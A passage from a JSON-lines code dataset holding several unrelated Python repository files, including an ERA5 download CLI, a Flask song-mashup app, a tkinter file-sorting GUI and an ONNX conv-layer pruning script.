table to ingest to')\n@click.option('--csv', help=\"csv to ingest\")\n@click.option('--key', default='hash')\n@click.option('--batch-size', default=50)\ndef csv_ingest_command(table, csv, key='hash', batch_size=50):\n ingested_df = ingest_csv(table, csv, key, batch_size)\n click.echo(f'{len(ingested_df)} records ingested')\n","repo_name":"puhrez/insuratech","sub_path":"backend/insuratech/commands/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3599570976","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPaulinho tem em suas mãos um novo problema. Agora a sua professora lhe pediu que construísse um programa para verificar, à partir de dois\nvalores muito grandes A e B, se B corresponde aos últimos dígitos de A.\n\"\"\"\ndef main():\n N = int(input())\n while N > 0:\n A, B = ([i for i in input().split()])\n inversoA = A[::-1]\n inversoB = B[::-1]\n tamanhoB = len(B)\n resposta = str.find(inversoA, inversoB, 0, tamanhoB)\n if resposta == -1:\n print('nao encaixa')\n else:\n print('encaixa')\n N -= 1\n\nif __name__ == '__main__':\n main()\n","repo_name":"sywrahg/URI","sub_path":"1241 - Encaixa ou Não II.py","file_name":"1241 - Encaixa ou Não II.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10987306279","text":"#!/usr/bin/env python\n\"\"\"Download ERA5 variables.\"\"\"\n\nimport argparse\nimport sys\nimport era5cli.fetch as efetch\nfrom era5cli import args\n\n\ndef _build_parser():\n \"\"\"Build the argument parser.\"\"\"\n parser = argparse.ArgumentParser(\n usage='Use \"%(prog)s --help\" for more information.',\n formatter_class=argparse.RawTextHelpFormatter,\n )\n subparsers = parser.add_subparsers(help=\"sub-command\", dest=\"command\")\n subparsers.required = True\n\n common = argparse.ArgumentParser(add_help=False)\n args.common.add_common_args(common)\n\n args.periods.add_period_args(subparsers, common)\n\n args.info.add_info_args(subparsers)\n\n args.config.add_config_args(subparsers)\n\n return parser\n\n\ndef _parse_args(args):\n \"\"\"Parse command line arguments.\"\"\"\n parser = _build_parser()\n return parser.parse_args(args)\n\n\ndef _execute(input_args: argparse.Namespace) -> True:\n \"\"\"Execute the arguments given by the user.\"\"\"\n\n if input_args.command == \"info\":\n return args.info.run_info(input_args)\n\n if input_args.command == \"config\":\n return args.config.run_config(input_args)\n\n # the fetching subroutines\n years = args.common.construct_year_list(input_args)\n synoptic, statistics, splitmonths, days, hours = args.periods.set_period_args(\n input_args\n )\n\n # try to build and send download request\n era5 = efetch.Fetch(\n years,\n months=input_args.months,\n days=days,\n hours=hours,\n variables=input_args.variables,\n area=input_args.area,\n outputformat=input_args.format,\n outputprefix=input_args.outputprefix,\n period=input_args.command,\n ensemble=input_args.ensemble,\n synoptic=synoptic,\n statistics=statistics,\n pressurelevels=input_args.levels,\n threads=input_args.threads,\n splitmonths=splitmonths,\n merge=input_args.merge,\n prelimbe=input_args.prelimbe,\n land=input_args.land,\n overwrite=input_args.overwrite,\n dashed_vars=input_args.dashed_varname,\n )\n era5.fetch(dryrun=input_args.dryrun)\n return True\n\n\ndef main(argv=None):\n \"\"\"Run era5cli.\n\n argv is an optional kwarg to be used in testing. When called\n from the command line, the user-input arguments are retreived\n using sys.argv.\n \"\"\"\n if argv is None:\n argv = sys.argv # pragma: no cover\n\n # Skip the first argument (i.e. 'era5cli')\n args = _parse_args(argv[1:])\n _execute(args)\n\n\nif __name__ == \"__main__\":\n main() # pragma: no cover\n","repo_name":"eWaterCycle/era5cli","sub_path":"era5cli/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"} +{"seq_id":"17989769019","text":"from flask import Flask, render_template, request, redirect, url_for, make_response, Response\r\nfrom Mixer import Mixer\r\n\r\nimport stream_azure as saz\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route(\"/\")\r\ndef start():\r\n progress_bar = False\r\n song_list = saz.list_blobs_flat_listing()\r\n\r\n resp = make_response(render_template('index_main.html', song_list=song_list, progress_bar=progress_bar))\r\n resp.delete_cookie('song1')\r\n resp.delete_cookie('song2')\r\n resp.delete_cookie('mash_up_name')\r\n\r\n return resp\r\n\r\n\r\n@app.route(\"/action\", methods=['POST', 'GET'])\r\ndef action():\r\n progress_bar = True\r\n song_list = saz.list_blobs_flat_listing()\r\n song1 = request.form.get(\"song1\")\r\n song2 = request.form.get(\"song2\")\r\n mash_up_name = request.form.get(\"mashup_name\")\r\n\r\n resp = make_response(render_template('index_main.html', song_list=song_list, progress_bar=progress_bar))\r\n resp.set_cookie('song1', song1)\r\n resp.set_cookie('song2', song2)\r\n resp.set_cookie('mash_up_name', mash_up_name)\r\n\r\n return resp\r\n\r\n\r\n@app.route(\"/work_progress\", methods=['POST', 'GET'])\r\ndef work_progress():\r\n song1 = request.cookies.get('song1')\r\n song2 = request.cookies.get('song2')\r\n mash_up_name = request.cookies.get('mash_up_name')\r\n if song1 or song2:\r\n mixer = Mixer()\r\n return Response(mixer.mix(song1, song2, mash_up_name), mimetype='text/event-stream')\r\n return 'ERROR: Missing song names, refresh and try again'\r\n\r\n\r\n@app.route(\"/player\", methods=['POST', 'GET'])\r\ndef test():\r\n mash_up_name = request.cookies.get('mash_up_name')\r\n mash_url = 'https://mashups.blob.core.windows.net/mashups/mixed_songs/' + mash_up_name + '.wav'\r\n mash_url = mash_url.replace(' ', '%20')\r\n return render_template('index_second_page.html', mashup_url=mash_url), mash_up_name\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(port=5005, debug=False)\r\n","repo_name":"alexandrova-s/Mash-up-Generator","sub_path":"flask_call_mashup.py","file_name":"flask_call_mashup.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12483785669","text":"from tkinter import*\r\nimport os, shutil, time\r\nfrom tkinter import ttk, filedialog, messagebox #using filedialog we can get popup we we can read the self.directory.\r\nclass Sorting_App:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"File Arrangement Application | Developed by Vivek Maurya\")\r\n self.root.geometry(\"1350x700+0+0\")\r\n self.root.resizable(0,0)\r\n self.root.config(bg=\"white\")\r\n self.logo_icon=PhotoImage(file=\"E:\\\\PythonProject\\\\Arrange_File_Application\\\\res\\\\appiconre.png\")\r\n title = Label(self.root, text=\"File Arrangement Application\",padx=15,image=self.logo_icon, compound=LEFT, font=(\"impact\", 40), bg=\"maroon\", fg=\"white\", anchor=\"w\").place(x=0, y=0, relwidth=1)\r\n\r\n\r\n #======Section 1=======\r\n self.var_foldername=StringVar()\r\n lbl_select_folder=Label(self.root, text=\"Select Folder\", font=(\"times new roman\", 20, \"bold\"), bg=\"white\").place(x=50, y=100,)\r\n txt_folder_name = Entry(self.root, textvariable=self.var_foldername, font=(\"times new roman\", 15),state=\"readonly\", bg=\"maroon\").place(x=250, y=100, height=40, width=600)\r\n btn_browse = Button(self.root, text=\"BROWSE\", command=self.browse, bd=2, relief=RAISED, font=(\"times new roman\", 15, \"bold\"), cursor=\"hand2\", bg=\"gray\", fg=\"white\", activebackground=\"gray\", activeforeground=\"white\").place(x=900, y=100, height=40, width=200)\r\n hr = Label(self.root, bg=\"lightgrey\").place(x=50, y=160, height=2, width=1250)\r\n\r\n #======Section 2=======\r\n #======All Extensions=======\r\n self.image_extensions=[\"Image Extensions\", '.jpg','.png', '.jpeg', '.JPG']\r\n self.audio_extensions=[\"Audio Extensions\", '.wav','.mp3', '.m4a']\r\n self.video_extensions=[\"Video Extension\", '.mp4', '.mkv']\r\n self.doc_extensions=[\"Documnet Extensions\", '.doc', '.xlsx', '.xls', '.xml', '.csv', '.pdf', '.doc', '.docx', '.pptx', '.ppt', '.zip', '.rar']\r\n\r\n self.folders={\r\n 'videos':self.video_extensions,\r\n 'audios':self.audio_extensions,\r\n 'images':self.image_extensions,\r\n 'documents':self.doc_extensions\r\n }\r\n\r\n lbl_support_ext=Label(self.root, text=\"Various Supported Extensions\", font=(\"times new roman\", 20, \"bold\"), bg=\"white\").place(x=50, y=170,)\r\n self.image_box = ttk.Combobox(self.root,state=\"readonly\", values=self.image_extensions, font=(\"times new roman\", 15), justify=\"center\")\r\n self.image_box.place(x=60, y=230, width=270, height=35)\r\n self.image_box.current(0)\r\n\r\n self.video_box = ttk.Combobox(self.root,state=\"readonly\", values=self.video_extensions, font=(\"times new roman\", 15), justify=\"center\")\r\n self.video_box.place(x=380, y=230, width=270, height=35)\r\n self.video_box.current(0)\r\n\r\n self.audio_box = ttk.Combobox(self.root,state=\"readonly\", values=self.audio_extensions, font=(\"times new roman\", 15), justify=\"center\")\r\n self.audio_box.place(x=700, y=230, width=270, height=35)\r\n self.audio_box.current(0)\r\n\r\n self.doc_box = ttk.Combobox(self.root,state=\"readonly\", values=self.doc_extensions, font=(\"times new roman\", 15), justify=\"center\")\r\n self.doc_box.place(x=1020, y=230, width=270, height=35)\r\n self.doc_box.current(0)\r\n\r\n #======Section 3=======\r\n #======All Image icons=======\r\n self.image_icon=PhotoImage(file=\"E:\\\\PythonProject\\\\Arrange_File_Application\\\\res\\\\imgre.png\")\r\n self.audio_icon=PhotoImage(file=\"E:\\\\PythonProject\\\\Arrange_File_Application\\\\res\\\\audiore.png\")\r\n self.video_icon=PhotoImage(file=\"E:\\\\PythonProject\\\\Arrange_File_Application\\\\res\\\\videore.png\")\r\n self.docum_icon=PhotoImage(file=\"E:\\\\PythonProject\\\\Arrange_File_Application\\\\res\\\\docre.png\")\r\n self.other_icon=PhotoImage(file=\"E:\\\\PythonProject\\\\Arrange_File_Application\\\\res\\\\unknownbgre.png\")\r\n\r\n Frame1 = Frame(self.root, bd=2, relief=RIDGE, bg=\"white\")\r\n Frame1.place(x=50, y=300, width=1250, height=300)\r\n\r\n self.lbl_total_files=Label(Frame1, text=\"Total Files: 0\", font=(\"times new roman\", 17), bg=\"white\")\r\n self.lbl_total_files.place(x=10,y=10)\r\n\r\n self.lbl_total_image = Label(Frame1, bd=2, relief=RAISED,pady=10, text=\"\", image=self.image_icon, compound=TOP, font=(\"times new roman\", 17, \"bold\"), bg=\"#008EA4\", fg=\"white\")\r\n self.lbl_total_image.place(x=16.66, y=60, width=230, height=200)\r\n\r\n self.lbl_total_audio = Label(Frame1, bd=2, relief=RAISED, text=\"\", image=self.audio_icon, compound=TOP, font=(\"times new roman\", 17, \"bold\"), bg=\"#008EA4\", fg=\"white\")\r\n self.lbl_total_audio.place(x=263.32, y=60, width=230, height=200)\r\n\r\n self.lbl_total_video = Label(Frame1, bd=2, relief=RAISED, pady=10, text=\"\", image=self.video_icon, compound=TOP, font=(\"times new roman\", 17, \"bold\"), bg=\"#008EA4\", fg=\"white\")\r\n self.lbl_total_video.place(x=509.98, y=60, width=230, height=200)\r\n\r\n self.lbl_total_docum = Label(Frame1, bd=2, relief=RAISED, text=\"\", image=self.docum_icon, compound=TOP, font=(\"times new roman\", 17, \"bold\"), bg=\"#008EA4\", fg=\"white\")\r\n self.lbl_total_docum.place(x=756.64, y=60, width=230, height=200)\r\n\r\n self.lbl_total_other = Label(Frame1, bd=2, relief=RAISED, text=\"\", image=self.other_icon, compound=TOP, font=(\"times new roman\", 17, \"bold\"), bg=\"#008EA4\", fg=\"white\")\r\n self.lbl_total_other.place(x=1003.3, y=60, width=230, height=200)\r\n\r\n\r\n #======Section 4=======\r\n #======All Image icons=======\r\n lbl_status=Label(self.root, text=\"STATUS\", font=(\"times new roman\", 20), bg=\"white\").place(x=50, y=620)\r\n self.lbl_total=Label(self.root, text=\"\", font=(\"times new roman\", 17), bg=\"white\", fg=\"Blue\")\r\n self.lbl_total.place(x=300, y=620)\r\n self.lbl_moved=Label(self.root, text=\"\", font=(\"times new roman\", 17), bg=\"white\", fg=\"Green\")\r\n self.lbl_moved.place(x=500, y=620)\r\n self.lbl_left=Label(self.root, text=\"\", font=(\"times new roman\", 17), bg=\"white\", fg =\"red\")\r\n self.lbl_left.place(x=700, y=620)\r\n \r\n self.btn_clear = Button(self.root, text=\"CLEAR\", state=NORMAL, command=self.clear_fxn, bd=2, relief=RAISED, font=(\"times new roman\", 15, \"bold\"), cursor=\"hand2\", bg=\"#607d8b\", fg=\"white\", activebackground=\"#607d8b\", activeforeground=\"white\")\r\n self.btn_clear.place(x=880, y=615, height=40, width=200)\r\n self.btn_start = Button(self.root, text=\"START\", state=DISABLED, command=self.start_fxn, bd=2, relief=RAISED, font=(\"times new roman\", 15, \"bold\"), cursor=\"hand2\", bg=\"#ff5722\", fg=\"white\", activebackground=\"#ff5722\", activeforeground=\"white\")\r\n self.btn_start.place(x=1100, y=615, height=40, width=200)\r\n\r\n \r\n \r\n \r\n def total_count(self):\r\n images=0\r\n audios=0\r\n videos=0\r\n documents=0\r\n others=0\r\n self.ttl=0\r\n \r\n for i in self.all_files:\r\n if os.path.isfile(os.path.join(self.directory,i))==True: #can also use (self.directory+\"\\\\\"+i) to join the path\r\n self.ttl+=1\r\n ext = \".\"+i.split(\".\")[-1]\r\n for folder_name in self.folders.items(): \r\n # print(folder_name)\r\n if ext.lower() in folder_name[1] and folder_name[0]==\"images\":\r\n images+=1\r\n elif ext.lower() in folder_name[1] and folder_name[0]==\"audios\":\r\n audios+=1\r\n elif ext.lower() in folder_name[1] and folder_name[0]==\"videos\":\r\n videos+=1\r\n elif ext.lower() in folder_name[1] and folder_name[0]==\"documents\":\r\n documents+=1\r\n \r\n others = self.ttl-(images+audios+videos+documents)\r\n self.lbl_total_image.config(text=\"Total Images\\n\"+str(images))\r\n self.lbl_total_audio.config(text=\"Total Audios\\n\"+str(audios))\r\n self.lbl_total_video.config(text=\"Total Videos\\n\"+str(videos))\r\n self.lbl_total_docum.config(text=\"Total Documents\\n\"+str(documents))\r\n self.lbl_total_other.config(text=\"Others\\n\"+str(others))\r\n self.lbl_total_files.config(text=\"Total Files: \"+str(self.ttl))\r\n\r\n self.lbl_total.config(text=\"TOTAL : \"+str(self.ttl))\r\n self.lbl_moved.config(text=\"MOVED : \"+str(0))\r\n self.lbl_left.config(text=\"LEFT : \"+str(self.ttl))\r\n\r\n \r\n \r\n\r\n def browse(self):\r\n op=filedialog.askdirectory(title=\"Select Folder for Arranging\")\r\n if op!=None:\r\n self.var_foldername.set(str(op))\r\n self.directory = self.var_foldername.get()\r\n self.other_name = \"others\"\r\n self.all_files = os.listdir(self.directory)\r\n self.rename_folder()\r\n #os.listdir will put all the files and folder present inside the given self.directory into the list\r\n #os.path.isfile() return true for all the files only not folder\r\n\r\n total_files = len(self.all_files)\r\n self.total_count()\r\n self.btn_start.config(state=NORMAL)\r\n\r\n def clear_fxn(self):\r\n self.btn_start.config(state=DISABLED)\r\n self.var_foldername.set(\"\")\r\n self.lbl_total.config(text=\"\")\r\n self.lbl_moved.config(text=\"\")\r\n self.lbl_left.config(text=\"\")\r\n \r\n self.lbl_total_image.config(text=\"\")\r\n self.lbl_total_audio.config(text=\"\")\r\n self.lbl_total_video.config(text=\"\")\r\n self.lbl_total_docum.config(text=\"\")\r\n self.lbl_total_other.config(text=\"\")\r\n self.lbl_total_files.config(text=\"Total Files: 0\")\r\n \r\n\r\n def start_fxn(self):\r\n # main code\r\n if self.var_foldername.get()!=\"\":\r\n self.btn_clear.config(state=DISABLED)\r\n c=1\r\n for i in self.all_files:\r\n if os.path.isfile(os.path.join(self.directory,i))==True: #can also use (self.directory+\"\\\\\"+i) to join the path\r\n ex = i.split(\".\") #spliting the file name into name and extension\r\n self.create_move(ex[-1],i) # passing extension and full name\r\n self.lbl_total.config(text=\"TOTAL : \"+str(self.ttl))\r\n self.lbl_moved.config(text=\"MOVED : \"+str(c))\r\n self.lbl_left.config(text=\"LEFT : \"+str(self.ttl - c))\r\n\r\n \r\n self.lbl_total.update()\r\n self.lbl_moved.update()\r\n self.lbl_left.update()\r\n \r\n \r\n #print(f\"Total files: {total_files} | Done: {count} | Left: {total_files - c}\")\r\n c+=1\r\n\r\n messagebox.showinfo(\"Success\", \"All files has moved successfully\")\r\n self.btn_start.config(state=DISABLED)\r\n self.btn_clear.config(state=NORMAL)\r\n else:\r\n messagebox.showinfo(\"Error\",\"Please select a folder\")\r\n \r\n\r\n\r\n\r\n def rename_folder(self):\r\n for folder in os.listdir(self.directory): #list the all files present inside the folder\r\n if os.path.isdir(os.path.join(self.directory,folder))==True: # true if folder found, isdir() return boolean for given path\r\n # if folder.lower() in self.folders:\r\n os.rename(os.path.join(self.directory,folder), os.path.join(self.directory, folder.lower()))\r\n\r\n\r\n\r\n def create_move(self, ext, file_name): #this function move the files to the designsted folder\r\n for folder_name in self.folders:\r\n flag=False\r\n if \".\"+ext in self.folders[folder_name]:\r\n if folder_name not in os.listdir(self.directory):\r\n os.mkdir(os.path.join(self.directory, folder_name)) #mkdir() used to make self.directory at specified location\r\n shutil.move(os.path.join(self.directory,file_name), os.path.join(self.directory,folder_name)) \r\n #shutil.move(, ) used to move file to specified loaction\r\n\r\n flag=True\r\n break\r\n\r\n if flag != True: \r\n # rename_other_folder()\r\n if self.other_name not in os.listdir(self.directory):\r\n os.mkdir(os.path.join(self.directory, self.other_name))\r\n shutil.move(os.path.join(self.directory,file_name), os.path.join(self.directory,self.other_name))\r\n\r\n\r\nroot = Tk()\r\nobj = Sorting_App(root)\r\nroot.iconbitmap(\"E:\\\\PythonProject\\\\Arrange_File_Application\\\\res\\\\appicon.ico\")\r\nroot.mainloop()","repo_name":"Vivek-Maurya/File-Arrangement-Application","sub_path":"arrange_app.py","file_name":"arrange_app.py","file_ext":"py","file_size_in_byte":12607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34385967304","text":"\"\"\"\n Deeplite coding challenge: onnx_pruner.\n The main goal of this coding challenge is to implement a method to prune conv layers of a given onnx model.\n\n Details:\n Take an onnx model and randomly remove x percent (x is a given number between 0 to 100) of conv layers in such\n a way that the new onnx model is still valid and you can train/test it.\n\n ** First select the random conv layers for pruning then remove them one by one (sequentially)\n ** You may need to adjust the input/output of remaining layers after each layer pruning\n ** you can test your code on vgg19\n ** Can you extend your work to support models with residual connections such as resnet family?\n ** We recommend using mxnet as the AI framework for this coding challenge due to its native support of onnx\n https://mxnet.incubator.apache.org/versions/master/api/python/contrib/onnx.html\n\"\"\"\n\nfrom collections import namedtuple\n\nimport numpy as np\nimport cv2\n\nimport torch\nimport torchvision\n\nimport mxnet as mx\nimport mxnet.contrib.onnx as onnx_mxnet\n\nimport onnx\nfrom onnx import shape_inference, numpy_helper, helper\n\n\ndef extract_linked_oneop_node_names(node_name_map, node_name):\n linked_node_names = []\n for k in node_name_map.keys():\n # Expand this exclusion list with 1-to-1 ops found at https://github.com/onnx/onnx/blob/master/docs/Operators.md\n if node_name in node_name_map[k].input and node_name_map[k].op_type in ['Relu', 'Dropout', 'MaxPool']:\n linked_node_names.append(k)\n linked_node_names += extract_linked_oneop_node_names(node_name_map, k)\n return linked_node_names\n\n\ndef extract_next_ingraph(node_name_map, node_name, rejected_node_names):\n if node_name not in rejected_node_names:\n return node_name\n for inp_name in node_name_map[node_name].input:\n if inp_name in node_name_map or inp_name == 'image_input':\n return extract_next_ingraph(node_name_map, inp_name, rejected_node_names)\n return -1\n\n\ndef prune(model, x):\n \"\"\"\n :param model: onnx model\n :param x: pruning ratio (0 to 100)\n :return: pruned model\n \"\"\"\n shape_inferred_model = shape_inference.infer_shapes(model)\n shape_map = {}\n for i in range(len(shape_inferred_model.graph.value_info)):\n dims = [d.dim_value for d in shape_inferred_model.graph.value_info[i].type.tensor_type.shape.dim]\n shape_map[shape_inferred_model.graph.value_info[i].name] = dims\n num_nodes = len(model.graph.node)\n all_conv_node_names = []\n plural_nodes = []\n node_name_map = {}\n param_name_map = {}\n input_name_map = {}\n for i in range(num_nodes):\n model.graph.node[i].name = model.graph.node[i].output[0]\n node_name_map[model.graph.node[i].name] = model.graph.node[i]\n if len(model.graph.node[i].output) > 1:\n plural_nodes.append(model.graph.node[i])\n if model.graph.node[i].op_type == 'Conv':\n all_conv_node_names.append(model.graph.node[i].name)\n all_conv_node_names = np.array(all_conv_node_names)\n\n for param in model.graph.initializer:\n param_name_map[param.name] = param\n\n for inp in model.graph.input:\n input_name_map[inp.name] = inp\n input_shape = [d.dim_value for d in input_name_map['image_input'].type.tensor_type.shape.dim]\n shape_map['image_input'] = input_shape\n all_conv_node_names_shuffled = list(all_conv_node_names.copy())\n np.random.shuffle(all_conv_node_names_shuffled)\n selected_conv_node_count = int(((100 - x) / 100.) * len(all_conv_node_names_shuffled))\n rejected_node_names = all_conv_node_names_shuffled[selected_conv_node_count:]\n for name in rejected_node_names: # finding full sets of nodes qualified for removal\n linked_oneop_node_names = extract_linked_oneop_node_names(node_name_map, name)\n rejected_node_names += linked_oneop_node_names\n new_nn_nodes = []\n new_nn_input_names = []\n for name in node_name_map.keys(): # identifying required input nodes in the new neural net\n if name in rejected_node_names:\n continue\n else:\n new_nn_nodes.append(node_name_map[name])\n input_names = node_name_map[name].input\n for input_name in input_names:\n if input_name in input_name_map:\n new_nn_input_names.append(input_name)\n new_nn_input_names = list(set(new_nn_input_names))\n new_nn_inputs = [input_name_map[name] for name in new_nn_input_names]\n new_nn_params = [param_name_map[name] for name in new_nn_input_names if name != model.graph.input[0].name]\n\n for i in range(len(new_nn_nodes)): # rewiring the neural net to fill gaps created by missing layers\n node = new_nn_nodes[i]\n if len(node.input) == 0:\n continue\n for j in range(len(node.input)):\n inp_name = node.input[j]\n if inp_name in rejected_node_names:\n ingraph_input_node_name = extract_next_ingraph(node_name_map, inp_name, rejected_node_names)\n node.input[j] = ingraph_input_node_name\n\n if node.op_type == 'Conv':\n input_shape = shape_map[ingraph_input_node_name]\n output_shape = shape_map[new_nn_nodes[i].name]\n in_channels = input_shape[1]\n out_channels = output_shape[1]\n for weight_name in node.input:\n if weight_name in param_name_map and len(param_name_map[weight_name].dims) == 4:\n conv_param_name = weight_name\n conv_param = param_name_map[conv_param_name]\n conv_input = input_name_map[conv_param_name]\n conv_filter_dims = conv_param.dims # in_c, out_c, kernel_height, kernel_width\n\n # filling re-aligning conv filter through kernel interpolation to work with new dimensions\n if conv_filter_dims[0] != in_channels:\n # internally implemented as -\n # np.frombuffer(conv_param.raw_data, dtype=np.float32).reshape(conv_param.dims)\n filter_values = numpy_helper.to_array(conv_param)\n\n fmap_size = conv_filter_dims[0]\n num_fmaps = conv_filter_dims[1]\n new_filter = np.zeros([in_channels, out_channels, conv_filter_dims[2], conv_filter_dims[3]])\n for fmap_idx in range(num_fmaps):\n fmap = filter_values[:, fmap_idx, :, :]\n new_fmap = np.zeros([in_channels, conv_filter_dims[2], conv_filter_dims[3]])\n for row_idx in range(conv_filter_dims[2]):\n fmap_slice = fmap[:, row_idx, :]\n\n # opencv resize does filter kernel interpolation and accepts new dims as width, height\n fmap_slice_interpolated = cv2.resize(fmap_slice, (fmap_slice.shape[1], in_channels))\n\n new_fmap[:, row_idx, :] = fmap_slice_interpolated\n new_filter[:, fmap_idx, :, :] = new_fmap\n conv_param.raw_data = new_filter.tobytes()\n conv_param.dims[0] = in_channels\n conv_input.type.tensor_type.shape.dim[0].dim_value = in_channels\n\n new_nn_graph = helper.make_graph(\n new_nn_nodes,\n \"ConvNet-trimmed-tmp\",\n new_nn_inputs,\n model.graph.output,\n new_nn_params\n )\n new_nn_model = helper.make_model(new_nn_graph)\n onnx.checker.check_model(new_nn_model)\n onnx.save_model(new_nn_model, 'vgg19_pruned-tmp.onnx')\n\n shape_inferred_model = shape_inference.infer_shapes(new_nn_model)\n new_shape_map = {}\n for i in range(len(shape_inferred_model.graph.value_info)):\n dims = [d.dim_value for d in shape_inferred_model.graph.value_info[i].type.tensor_type.shape.dim]\n new_shape_map[shape_inferred_model.graph.value_info[i].name] = dims\n input_shape = [d.dim_value for d in input_name_map['image_input'].type.tensor_type.shape.dim]\n new_shape_map['image_input'] = input_shape\n\n dense_nodes = [node for node in new_nn_model.graph.node if node.op_type == 'Gemm']\n dense_node = dense_nodes[0]\n inp_node = node_name_map[dense_node.input[0]]\n while inp_node.op_type not in ['Conv', 'MaxPool']:\n inp_node = node_name_map[inp_node.input[0]]\n\n pre_dense_shape = new_shape_map[inp_node.name]\n init_dense_layer_params = numpy_helper.to_array(param_name_map[dense_node.input[1]])\n new_dim_input_neurons_dense = np.prod(pre_dense_shape[1:])\n new_dense_layer_params = cv2.resize(init_dense_layer_params, (new_dim_input_neurons_dense,\n init_dense_layer_params.shape[0]))\n param_name_map[dense_node.input[1]].raw_data = new_dense_layer_params.tobytes()\n param_name_map[dense_node.input[1]].dims[1] = new_dim_input_neurons_dense\n input_name_map[dense_node.input[1]].type.tensor_type.shape.dim[1].dim_value = new_dim_input_neurons_dense\n\n # Random conv layer removal sometimes causes the conv-layer just before the dense layer to output a large\n # volume (spatially). This causes the number of params in the dense layer to blow up, significantly increasing\n # nn size.\n\n final_nn_graph = helper.make_graph(\n new_nn_nodes,\n \"ConvNet-trimmed\",\n new_nn_inputs,\n model.graph.output,\n new_nn_params\n )\n final_nn_model = helper.make_model(final_nn_graph)\n\n onnx.checker.check_model(final_nn_model) # TODO: Sort nodes topologically, else fails when shallowest conv layer is removed\n\n return final_nn_model\n\n\ndef logit2class_mapper():\n with open('imagenet_classes.txt', 'r') as f:\n class_keys = f.readlines()\n class_keys = [cls.strip() for cls in class_keys]\n with open('imagenet_synsets.txt', 'r') as f:\n data = f.readlines()\n key2label_map = {d.strip().split(' ')[0]: ' '.join(d.strip().split(' ')[1:]) for d in data}\n logitmap = [key2label_map[k] for k in class_keys]\n return logitmap\n\n\nif __name__ == '__main__':\n\n logitmap = logit2class_mapper()\n im = cv2.resize(cv2.imread('car.jpg'), (224, 224))[:, :, [2, 1, 0]]\n im = (np.rollaxis(im, 2, 0) / 255.).astype(np.float32)\n im = np.expand_dims(im, 0)\n\n # ----------------- CREATION OF ONNX MODEL FROM PRETRAINED PYTORCH MODEL ----------------- #\n # model = torchvision.models.vgg19(pretrained=True).cuda()\n # dummy_input = torch.from_numpy(im).cuda()\n # dummy_output = model.forward(dummy_input).cpu().detach().numpy()[0]\n # out_label = logitmap[dummy_output.argmax()]\n # print('PyTorch classified label -', out_label)\n # input_names = ['image_input']\n # output_names = ['logit_outs']\n # torch.onnx.export(model, dummy_input, \"vgg19.onnx\", verbose=True, input_names=input_names,\n # output_names=output_names, export_params=True)\n # ----------------- CREATION OF ONNX MODEL FROM PRETRAINED PYTORCH MODEL ----------------- #\n\n # -------------------------------- OPERATING ON ONNX MODEL -------------------------------- #\n # model = onnx.load('vgg19.onnx')\n # onnx.checker.check_model(model)\n # print('Original model -')\n # print(helper.printable_graph(model.graph))\n #\n # pruned_model = prune(model, 20)\n # print('Pruned model -')\n # print(helper.printable_graph(pruned_model.graph))\n # onnx.save_model(pruned_model, 'vgg19_pruned.onnx')\n # -------------------------------- OPERATING ON ONNX MODEL -------------------------------- #\n\n # ----------------- LOADING PRUNED ONNX MODEL AND VALIDATION IN MXNET ----------------- #\n # KeyError: 'concat0' -> https://github.com/apache/incubator-mxnet/issues/13949 (open GitHub issue)\n # modified mxnet source code at -\n # https://github.com/apache/incubator-mxnet/blob/master/python/mxnet/contrib/onnx/onnx2mx/_op_translations.py#L462\n # to accommodate for missing shape of resulting tensor after reshaping.\n # Source code changed -\n # reshape_shape = list(proto_obj._params[inputs[1].name].asnumpy()) (previous)\n # reshape_shape = [1, ] (replaced with this, hacky solution for now)\n # Ideally this should be a flatten operator but PyTorch exports it as a reshape :(\n sym, arg, aux = onnx_mxnet.import_model('vgg19_pruned.onnx')\n data_names = [graph_input for graph_input in sym.list_inputs()\n if graph_input not in arg and graph_input not in aux]\n param_names_args = [graph_input for graph_input in arg if graph_input not in data_names]\n param_names_aux = [graph_input for graph_input in aux if graph_input not in data_names]\n param_shapes_args = [arg[n].shape for n in param_names_args]\n param_shapes_aux = [arg[n].shape for n in param_names_aux]\n\n param_names_all = param_names_args + param_names_aux\n param_shapes_all = param_shapes_args + param_shapes_aux\n\n all_data_names = [data_names[0]] + param_names_all\n all_data_shapes = [im.shape] + param_shapes_all\n\n all_data_shape_list = list(zip(all_data_names, all_data_shapes))\n\n # mod = mx.mod.Module(symbol=sym, data_names=all_data_names, context=mx.gpu(), label_names=None)\n mod = mx.mod.Module(symbol=sym, data_names=[data_names[0]], context=mx.gpu(), label_names=None)\n\n # mod.bind(for_training=False, data_shapes=all_data_shape_list, label_shapes=None)\n mod.bind(for_training=True, data_shapes=[(data_names[0], im.shape)], label_shapes=None)\n\n mod.set_params(arg_params=arg, aux_params=aux, allow_missing=True, allow_extra=True)\n\n Batch = namedtuple('Batch', ['data'])\n mod.forward(Batch([mx.nd.array(im)]))\n out_logits = mod.get_outputs()[0].asnumpy()[0].argmax()\n out_label = logitmap[out_logits]\n print('MXnet classified label from convertted ONNX model -', out_label)\n\n k = 0\n # ----------------- LOADING PRUNED ONNX MODEL AND VALIDATION IN MXNET ----------------- #","repo_name":"ironhide23586/deeplite-challenge","sub_path":"onnx_pruning/onnx_pruner.py","file_name":"onnx_pruner.py","file_ext":"py","file_size_in_byte":14084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72638594408","text":"from typing import Mapping, Union\n\nimport torch\nfrom torch import Tensor\nfrom torchmetrics import Metric\n\nfrom composer.loss import soft_cross_entropy\n\n__all__ = [\"Perplexity\", \"BinaryF1Score\", \"HFCrossEntropy\", \"LanguageCrossEntropy\", \"MaskedAccuracy\"]\n\n\nclass 